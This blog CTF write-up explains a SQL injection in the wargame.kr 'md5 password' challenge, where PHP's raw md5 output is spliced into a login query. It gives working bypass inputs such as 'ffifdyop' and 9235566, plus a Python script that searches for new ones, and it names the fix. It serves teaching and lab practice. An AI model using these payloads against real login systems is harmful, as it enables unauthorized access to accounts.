Monday, 9 December 2019

[WARGAME.KR] MD5 PASSWORD VULNERABILITY WRITEUP!

This challenge asks you to submit a password. The server passes it through md5($ps, true) and splices the result straight into this SQL query:

$row=@mysql_fetch_array(mysql_query("select * from admin_password where password='".md5($ps,true)."'"));

Of course we have no idea what the real password is, so we have to find a way to make this query return a row anyway: SQL injection.

First, take a look at the md5() function signature and where the weakness comes from:

string md5 ( string $str [, bool $raw_output = false ] )

The string passed as the first argument is MD5-hashed. By default ($raw_output = false) the digest is returned as a 32-character hex string, which can only contain 0-9 and a-f and is therefore harmless inside a quoted SQL literal. With $raw_output = true the digest is returned as 16 raw bytes instead, and any byte value can show up there, including the single quote (0x27). Nothing escapes those bytes before they are concatenated into the query.

Now back to the SQL query:

mysql_query("select * from admin_password where password='".md5($ps,true)."'");

If we can force the raw digest to contain 'or' (MySQL keywords are case-insensitive, so 'OR' works too) or '=', the quote bytes close the string literal early and the rest of the digest is parsed as SQL. With 'or' the query becomes:

mysql_query("select * from admin_password where password='<junk>'or'<digit...>'");

The comparison on the left is false (the junk bytes are not the stored password), but MySQL casts the string after or to a number, and a string that starts with a non-zero digit casts to a non-zero number, i.e. true. Example: 'DAD'OR'1=1 → FALSE OR TRUE → TRUE.

For this case, 129581926211651571912466741651878684928 is the password to send to the md5 function: its raw digest ends in the bytes 'or'8.

Or, with '=':

mysql_query("select * from admin_password where password='<junk>'='<junk>'");

MySQL evaluates a = b = c from left to right as (a = b) = c. password='<junk>' is false, i.e. 0, and a string that does not start with a digit also casts to 0, so 0 = 0 is true. Example: 'DAD'='SDSD → FALSE = FALSE → TRUE.

For this case, 9235566 is the password to send to the md5 function.

In both cases the WHERE clause evaluates to true without knowing the password, so the query returns the admin row and the login succeeds. Note that this only works because the raw digest is concatenated unescaped; returning the hex form (md5($ps) without the second argument) or using a prepared statement would close the hole.
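To see what these raw digests actually look like and to hunt for more payloads, here is a small Python script. It is an added example, not code from the original writeup or the challenge: it reproduces md5($ps, true) with hashlib, renders the query string mysql_query() would receive, and checks a candidate password against both injection shapes described above, rejecting digests whose extra quote or backslash bytes would only produce a syntax error. The acceptance rules for the trailing operand and the numeric search window are assumptions, a conservative approximation of how MySQL casts strings to numbers.

```python
# Added example (not from the original writeup): reproduce PHP's md5($ps, true)
# and test candidate passwords against the two injection shapes.
import hashlib
from typing import Iterable, Optional

# A trailing string operand that starts with one of these bytes casts to a
# non-zero number in MySQL ('8...' -> 8), which is what the 'or' variant needs.
# Assumption: sign, decimal point and whitespace leads are deliberately ignored.
NONZERO_LEAD = b"123456789"
# Anything starting with these might cast to non-zero, so the '=' variant
# (which needs the tail to cast to 0) conservatively rejects them as well.
MAYBE_NUMERIC_LEAD = NONZERO_LEAD + b".+- \t\n\r"


def raw_md5(password: str) -> bytes:
    """PHP md5($password, true): the 16 raw digest bytes, not the hex form."""
    return hashlib.md5(password.encode()).digest()


def rendered_query(password: str) -> str:
    """The SQL string mysql_query() receives; latin-1 keeps every byte visible."""
    digest = raw_md5(password).decode("latin-1")
    return "select * from admin_password where password='" + digest + "'"


def literal_is_sane(digest: bytes) -> bool:
    """Exactly the two quotes we rely on and no backslash to escape anything.
    Extra quotes or a backslash turn the query into a syntax error instead."""
    return digest.count(b"'") == 2 and b"\\" not in digest


def or_variant_offset(digest: bytes) -> Optional[int]:
    """Offset of 'or' (any case) followed by a non-zero digit, else None.
    Gives: password='<junk>' or '<digit>...'  ->  FALSE OR TRUE."""
    for i in range(len(digest) - 4):
        if (digest[i] == 0x27 and digest[i + 1:i + 3].lower() == b"or"
                and digest[i + 3] == 0x27 and digest[i + 4] in NONZERO_LEAD):
            return i
    return None


def eq_variant_offset(digest: bytes) -> Optional[int]:
    """Offset of '=' whose tail casts to 0, else None.
    Gives: (password='<junk>') = '<tail>'  ->  0 = 0  ->  TRUE."""
    for i in range(len(digest) - 2):
        if digest[i:i + 3] == b"'='":
            tail = digest[i + 3:]
            if not tail or tail[0] not in MAYBE_NUMERIC_LEAD:
                return i
    return None


def classify(password: str) -> Optional[str]:
    """'or', 'eq', or None if this password does not inject cleanly."""
    digest = raw_md5(password)
    if not literal_is_sane(digest):
        return None
    if or_variant_offset(digest) is not None:
        return "or"
    if eq_variant_offset(digest) is not None:
        return "eq"
    return None


def find_payload(candidates: Iterable[str], variant: Optional[str] = None) -> Optional[str]:
    """First candidate that injects (optionally restricted to one variant)."""
    for candidate in candidates:
        kind = classify(candidate)
        if kind is not None and (variant is None or kind == variant):
            return candidate
    return None


def numeric_candidates(start: int, count: int) -> Iterable[str]:
    """Decimal strings start..start+count-1; the search space is an assumption."""
    return (str(n) for n in range(start, start + count))


if __name__ == "__main__":
    for pw in ("ffifdyop", "129581926211651571912466741651878684928", "hello"):
        print(pw, "->", raw_md5(pw).hex(), classify(pw))
    print(rendered_query("ffifdyop"))
    # A real brute force needs on the order of millions of hashes per hit;
    # this tiny window around a known payload is only a smoke test.
    print(find_payload(numeric_candidates(129581926211651571912466741651878684920, 20)))
```

Running it shows the well-known payload ffifdyop as a second 'or' hit whose digest starts with the bytes 'or'6, and prints the exact query text the server ends up executing, quotes included. To search for fresh payloads, feed find_payload() a larger generator of candidates and be prepared to wait.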




Happy hacking!